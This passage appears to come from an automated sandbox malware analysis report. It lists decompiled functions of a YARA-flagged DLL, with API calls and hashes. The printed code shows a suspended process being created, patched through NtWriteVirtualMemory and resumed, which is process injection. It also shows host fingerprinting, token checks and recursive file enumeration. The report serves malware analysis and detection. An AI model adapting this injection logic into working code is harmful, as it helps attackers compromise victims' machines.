                                    				_t38 = E1000C392(_t43);
                                    				_v12 = _t38;
                                    				CharUpperBuffW(_t43, _t38);
                                    				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
                                    			}


                                    APIs
                                    • memset.MSVCRT ref: 1000B7C5
                                    • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
                                    • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
                                    • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
                                      • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
                                    • lstrcatW.KERNEL32 ref: 1000B85A
                                    • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                    • String ID:
                                    • API String ID: 3410906232-0
                                    • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                                    • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
                                    • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                                    • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E1000CA25(intOrPtr __edx) {
                                    				signed int _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				void* _v36;
                                    				char _v40;
                                    				char _v80;
                                    				char _t37;
                                    				intOrPtr _t38;
                                    				void* _t45;
                                    				intOrPtr _t47;
                                    				intOrPtr _t48;
                                    				intOrPtr _t50;
                                    				intOrPtr _t52;
                                    				void* _t54;
                                    				intOrPtr _t57;
                                    				long _t61;
                                    				intOrPtr _t62;
                                    				signed int _t65;
                                    				signed int _t68;
                                    				signed int _t82;
                                    				void* _t85;
                                    				char _t86;
                                    
                                    				_v8 = _v8 & 0x00000000;
                                    				_v20 = __edx;
                                    				_t65 = 0;
                                    				_t37 = E1000C8FD( &_v8);
                                    				_t86 = _t37;
                                    				_v24 = _t86;
                                    				_t87 = _t86;
                                    				if(_t86 == 0) {
                                    					return _t37;
                                    				}
                                    				_t38 =  *0x1001e688; // 0x8a40590
                                    				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
                                    				_t82 = _v8;
                                    				_t68 = 0;
                                    				_v16 = 0;
                                    				if(_t82 == 0) {
                                    					L20:
                                    					E1000861A( &_v24, 0);
                                    					return _t65;
                                    				}
                                    				while(_t65 == 0) {
                                    					while(_t65 == 0) {
                                    						asm("stosd");
                                    						asm("stosd");
                                    						asm("stosd");
                                    						asm("stosd");
                                    						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
                                    						_t92 = _t45;
                                    						if(_t45 >= 0) {
                                    							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
                                    							if(_t54 != 0) {
                                    								_t57 =  *0x1001e684; // 0x8abfaa0
                                    								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
                                    								if(_t85 != 0) {
                                    									GetLastError();
                                    									_t61 = ResumeThread(_v36);
                                    									_t62 =  *0x1001e684; // 0x8abfaa0
                                    									if(_t61 != 0) {
                                    										_push(0xea60);
                                    										_push(_t85);
                                    										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
                                    											_t65 = _t65 + 1;
                                    										}
                                    										_t62 =  *0x1001e684; // 0x8abfaa0
                                    									}
                                    									CloseHandle(_t85);
                                    								}
                                    							}
                                    						}
                                    						if(_v40 != 0) {
                                    							if(_t65 == 0) {
                                    								_t52 =  *0x1001e684; // 0x8abfaa0
                                    								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
                                    							}
                                    							_t48 =  *0x1001e684; // 0x8abfaa0
                                    							 *((intOrPtr*)(_t48 + 0x30))(_v36);
                                    							_t50 =  *0x1001e684; // 0x8abfaa0
                                    							 *((intOrPtr*)(_t50 + 0x30))(_v40);
                                    						}
                                    						_t68 = _v16;
                                    						_t47 = _v12 + 1;
                                    						_v12 = _t47;
                                    						if(_t47 < 2) {
                                    							continue;
                                    						} else {
                                    							break;
                                    						}
                                    					}
                                    					_t82 = _v8;
                                    					_t68 = _t68 + 1;
                                    					_v16 = _t68;
                                    					if(_t68 < _t82) {
                                    						continue;
                                    					} else {
                                    						break;
                                    					}
                                    					do {
                                    						goto L19;
                                    					} while (_t82 != 0);
                                    					goto L20;
                                    				}
                                    				L19:
                                    				E1000861A(_t86, 0xfffffffe);
                                    				_t86 = _t86 + 4;
                                    				_t82 = _t82 - 1;
                                    			}


                                    APIs
                                      • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
                                      • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                                      • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
                                      • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                                      • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                                      • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                                      • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                                    • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
                                    • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
                                    • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
                                    • String ID:
                                    • API String ID: 1274669455-0
                                    • Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                                    • Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
                                    • Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                                    • Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                    				long _v8;
                                    				void* _v12;
                                    				void* _t12;
                                    				void* _t20;
                                    				void* _t22;
                                    				union _TOKEN_INFORMATION_CLASS _t28;
                                    				void* _t31;
                                    
                                    				_push(_t22);
                                    				_push(_t22);
                                    				_t31 = 0;
                                    				_t28 = __edx;
                                    				_t20 = _t22;
                                    				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                    					L6:
                                    					_t12 = _t31;
                                    				} else {
                                    					_t31 = E10008604(_v8);
                                    					_v12 = _t31;
                                    					if(_t31 != 0) {
                                    						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                    							goto L6;
                                    						} else {
                                    							E1000861A( &_v12, _t16);
                                    							goto L3;
                                    						}
                                    					} else {
                                    						L3:
                                    						_t12 = 0;
                                    					}
                                    				}
                                    				return _t12;
                                    			}


                                    APIs
                                    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                                    • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                                      • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: InformationToken$AllocErrorHeapLast
                                    • String ID:
                                    • API String ID: 4258577378-0
                                    • Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                                    • Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
                                    • Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                                    • Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 47%
                                    			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                    				struct _STARTUPINFOW _v72;
                                    				signed int _t11;
                                    				WCHAR* _t15;
                                    				int _t19;
                                    				struct _PROCESS_INFORMATION* _t20;
                                    
                                    				_t20 = __edx;
                                    				_t15 = __ecx;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t19 = 0x44;
                                    				memset( &_v72, 0, _t19);
                                    				_v72.cb = _t19;
                                    				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
                                    				asm("sbb eax, eax");
                                    				return  ~( ~_t11) - 1;
                                    			}









                                    APIs
                                    • memset.MSVCRT ref: 1000AE85
                                    • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateProcessmemset
                                    • String ID:
                                    • API String ID: 2296119082-0
                                    • Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                                    • Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
                                    • Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                                    • Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 47%
                                    			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                                    				char _v8;
                                    				char _t5;
                                    				struct HINSTANCE__* _t7;
                                    				void* _t10;
                                    				void* _t12;
                                    				void* _t22;
                                    				void* _t25;
                                    
                                    				_push(__ecx);
                                    				_t12 = __ecx;
                                    				_t22 = __edx;
                                    				_t5 = E100095C7(_a4);
                                    				_t25 = 0;
                                    				_v8 = _t5;
                                    				_push(_t5);
                                    				if(_a4 != 0x7c3) {
                                    					_t7 = LoadLibraryA(); // executed
                                    				} else {
                                    					_t7 = GetModuleHandleA();
                                    				}
                                    				if(_t7 != 0) {
                                    					_t10 = E1000E171(_t12, _t22, _t7); // executed
                                    					_t25 = _t10;
                                    				}
                                    				E100085C2( &_v8);
                                    				return _t25;
                                    			}











                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
                                    • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: HandleLibraryLoadModule
                                    • String ID:
                                    • API String ID: 4133054770-0
                                    • Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                                    • Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
                                    • Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                                    • Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
                                    				CHAR* _v8;
                                    				int _t28;
                                    				signed int _t31;
                                    				signed int _t34;
                                    				signed int _t35;
                                    				void* _t38;
                                    				signed int* _t41;
                                    
                                    				_t41 = _a8;
                                    				_t31 = 0;
                                    				if(_t41[1] > 0) {
                                    					_t38 = 0;
                                    					do {
                                    						_t3 =  &(_t41[2]); // 0xe6840d8b
                                    						_t34 =  *_t3;
                                    						_t35 = 0;
                                    						_a8 = 0;
                                    						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
                                    							_v8 = _a4 + 0x24;
                                    							while(1) {
                                    								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
                                    								_t14 =  &(_t41[2]); // 0xe6840d8b
                                    								_t34 =  *_t14;
                                    								if(_t28 == 0) {
                                    									break;
                                    								}
                                    								_t35 = _a8 + 1;
                                    								_a8 = _t35;
                                    								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
                                    									continue;
                                    								} else {
                                    								}
                                    								goto L8;
                                    							}
                                    							 *_t41 =  *_t41 |  *(_t34 + _t38);
                                    						}
                                    						L8:
                                    						_t31 = _t31 + 1;
                                    						_t38 = _t38 + 0x10;
                                    						_t20 =  &(_t41[1]); // 0x1374ff85
                                    					} while (_t31 <  *_t20);
                                    				}
                                    				Sleep(0xa);
                                    				return 1;
                                    			}











                                    APIs
                                    • lstrcmpi.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
                                    • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Sleeplstrcmpi
                                    • String ID:
                                    • API String ID: 1261054337-0
                                    • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                                    • Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
                                    • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                                    • Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E10005E96() {
                                    				intOrPtr _t3;
                                    
                                    				_t3 =  *0x1001e684; // 0x8abfaa0
                                    				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
                                    				ExitProcess(0);
                                    			}




                                    0x10005e96
                                    0x10005ea3
                                    0x10005ead

                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 10005EAD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                                    • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
                                    • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                                    • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E100085EF() {
                                    				void* _t1;
                                    
                                    				_t1 = HeapCreate(0, 0x80000, 0); // executed
                                    				 *0x1001e768 = _t1;
                                    				return _t1;
                                    			}




                                    0x100085f8
                                    0x100085fe
                                    0x10008603

                                    APIs
                                    • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHeap
                                    • String ID:
                                    • API String ID: 10892065-0
                                    • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                                    • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
                                    • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                                    • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 47%
                                    			E1000BA62(void* __ecx, void* __esi) {
                                    				intOrPtr* _v8;
                                    				char _v12;
                                    				void* _v16;
                                    				char _v20;
                                    				char _v24;
                                    				short _v28;
                                    				char _v32;
                                    				void* _t20;
                                    				intOrPtr* _t21;
                                    				intOrPtr _t29;
                                    				intOrPtr _t31;
                                    				intOrPtr* _t33;
                                    				intOrPtr _t34;
                                    				char _t37;
                                    				union _TOKEN_INFORMATION_CLASS _t44;
                                    				char _t45;
                                    				intOrPtr* _t48;
                                    
                                    				_t37 = 0;
                                    				_v28 = 0x500;
                                    				_t45 = 0;
                                    				_v32 = 0;
                                    				_t20 = E1000B946(__ecx);
                                    				_v16 = _t20;
                                    				if(_t20 != 0) {
                                    					_push( &_v24);
                                    					_t44 = 2;
                                    					_t21 = E1000B998(_t44); // executed
                                    					_t48 = _t21;
                                    					_v20 = _t48;
                                    					if(_t48 == 0) {
                                    						L10:
                                    						CloseHandle(_v16);
                                    						if(_t48 != 0) {
                                    							E1000861A( &_v20, _t37);
                                    						}
                                    						return _t45;
                                    					}
                                    					_push( &_v12);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0x220);
                                    					_push(0x20);
                                    					_push(2);
                                    					_push( &_v32);
                                    					_t29 =  *0x1001e68c; // 0x8abfc68
                                    					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                    						goto L10;
                                    					}
                                    					if( *_t48 <= 0) {
                                    						L9:
                                    						_t31 =  *0x1001e68c; // 0x8abfc68
                                    						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                    						_t37 = 0;
                                    						goto L10;
                                    					}
                                    					_t9 = _t48 + 4; // 0x4
                                    					_t33 = _t9;
                                    					_v8 = _t33;
                                    					while(1) {
                                    						_push(_v12);
                                    						_push( *_t33);
                                    						_t34 =  *0x1001e68c; // 0x8abfc68
                                    						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                    							break;
                                    						}
                                    						_t37 = _t37 + 1;
                                    						_t33 = _v8 + 8;
                                    						_v8 = _t33;
                                    						if(_t37 <  *_t48) {
                                    							continue;
                                    						}
                                    						goto L9;
                                    					}
                                    					_t45 = 1;
                                    					goto L9;
                                    				}
                                    				return _t20;
                                    			}





















                                    APIs
                                      • Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
                                      • Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
                                      • Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
                                      • Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                                      • Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                                    • CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentErrorLast$CloseHandleInformationProcessThreadToken
                                    • String ID:
                                    • API String ID: 3752664914-0
                                    • Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                                    • Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
                                    • Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                                    • Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 30%
                                    			E1000D523(void* __ecx) {
                                    				char _v8;
                                    				void* _v12;
                                    				char* _t15;
                                    				intOrPtr* _t16;
                                    				void* _t21;
                                    				intOrPtr* _t23;
                                    				intOrPtr* _t24;
                                    				intOrPtr* _t25;
                                    				void* _t30;
                                    				void* _t33;
                                    
                                    				_v12 = 0;
                                    				_v8 = 0;
                                    				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                    				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                    				_t15 =  &_v12;
                                    				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
                                    				if(_t15 < 0) {
                                    					L5:
                                    					_t23 = _v8;
                                    					if(_t23 != 0) {
                                    						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                    					}
                                    					_t24 = _v12;
                                    					if(_t24 != 0) {
                                    						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                    					}
                                    					_t16 = 0;
                                    				} else {
                                    					__imp__#2(__ecx);
                                    					_t25 = _v12;
                                    					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                    					if(_t21 < 0) {
                                    						goto L5;
                                    					} else {
                                    						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                    						if(_t21 < 0) {
                                    							goto L5;
                                    						} else {
                                    							_t16 = E10008604(8);
                                    							if(_t16 == 0) {
                                    								goto L5;
                                    							} else {
                                    								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                    								 *_t16 = _v8;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _t16;
                                    			}














                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                                    • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                                    • SysAllocString.OLEAUT32(00000000), ref: 1000D569
                                    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                                      • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                                    • String ID:
                                    • API String ID: 2855449287-0
                                    • Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                                    • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
                                    • Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                                    • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E1000AEB4(void* __ecx, void* __fp0, intOrPtr _a16) {
                                    				char _v12;
                                    				WCHAR* _v16;
                                    				short _v560;
                                    				short _v562;
                                    				struct _WIN32_FIND_DATAW _v608;
                                    				WCHAR* _t27;
                                    				void* _t31;
                                    				int _t36;
                                    				intOrPtr _t37;
                                    				intOrPtr _t44;
                                    				void* _t48;
                                    				intOrPtr _t49;
                                    				void* _t51;
                                    				intOrPtr _t56;
                                    				void* _t61;
                                    				char _t62;
                                    				void* _t63;
                                    				void* _t64;
                                    				void* _t65;
                                    				void* _t80;
                                    
                                    				_t80 = __fp0;
                                    				_push(0);
                                    				_t51 = __ecx;
                                    				_push(L"\\*");
                                    				_t27 = E100092E5(__ecx);
                                    				_t65 = _t64 + 0xc;
                                    				_v16 = _t27;
                                    				if(_t27 == 0) {
                                    					return _t27;
                                    				}
                                    				_t61 = FindFirstFileW(_t27,  &_v608);
                                    				if(_t61 == 0xffffffff) {
                                    					L18:
                                    					return E1000861A( &_v16, 0xfffffffe);
                                    				}
                                    				_t31 = 0x2e;
                                    				do {
                                    					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
                                    						if((_v608.dwFileAttributes & 0x00000010) != 0) {
                                    							L14:
                                    							_push(0);
                                    							_push( &(_v608.cFileName));
                                    							_push("\\");
                                    							_t62 = E100092E5(_t51);
                                    							_t65 = _t65 + 0x10;
                                    							_v12 = _t62;
                                    							if(_t62 != 0) {
                                    								_t56 =  *0x1001e684; // 0x8abfaa0
                                    								 *((intOrPtr*)(_t56 + 0xb4))(1);
                                    								_push(1);
                                    								_push(1);
                                    								_push(0);
                                    								E1000AEB4(_t62, _t80, 1, 5, E1000EFAA, _a16);
                                    								_t65 = _t65 + 0x1c;
                                    								E1000861A( &_v12, 0xfffffffe);
                                    							}
                                    							goto L16;
                                    						}
                                    						_t63 = 0;
                                    						do {
                                    							_t10 = _t63 + 0x1001e78c; // 0x0
                                    							_push( *_t10);
                                    							_push( &(_v608.cFileName));
                                    							_t44 =  *0x1001e690; // 0x8abfd40
                                    							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
                                    								goto L12;
                                    							}
                                    							_t48 = E1000EFAA(_t80, _t51,  &_v608, _a16);
                                    							_t65 = _t65 + 0xc;
                                    							if(_t48 == 0) {
                                    								break;
                                    							}
                                    							_t49 =  *0x1001e684; // 0x8abfaa0
                                    							 *((intOrPtr*)(_t49 + 0xb4))(1);
                                    							L12:
                                    							_t63 = _t63 + 4;
                                    						} while (_t63 < 4);
                                    						if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                    							goto L16;
                                    						}
                                    						goto L14;
                                    					}
                                    					L16:
                                    					_t36 = FindNextFileW(_t61,  &_v608);
                                    					_t31 = 0x2e;
                                    				} while (_t36 != 0);
                                    				_t37 =  *0x1001e684; // 0x8abfaa0
                                    				 *((intOrPtr*)(_t37 + 0x78))(_t61);
                                    				goto L18;
                                    			}
























                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AEE5
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 1000AFE6
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$FirstNext
                                    • String ID:
                                    • API String ID: 1690352074-0
                                    • Opcode ID: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                                    • Instruction ID: 241d9436e866cb8d74d7214ef8056216292051dc3c91cda8f0119f884e331b15
                                    • Opcode Fuzzy Hash: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                                    • Instruction Fuzzy Hash: 8E31A47190021A6EFB10DBE4CC89FAA33B9EB047D0F110165F509AA1D5E771EEC4CB65
                                    Uniqueness

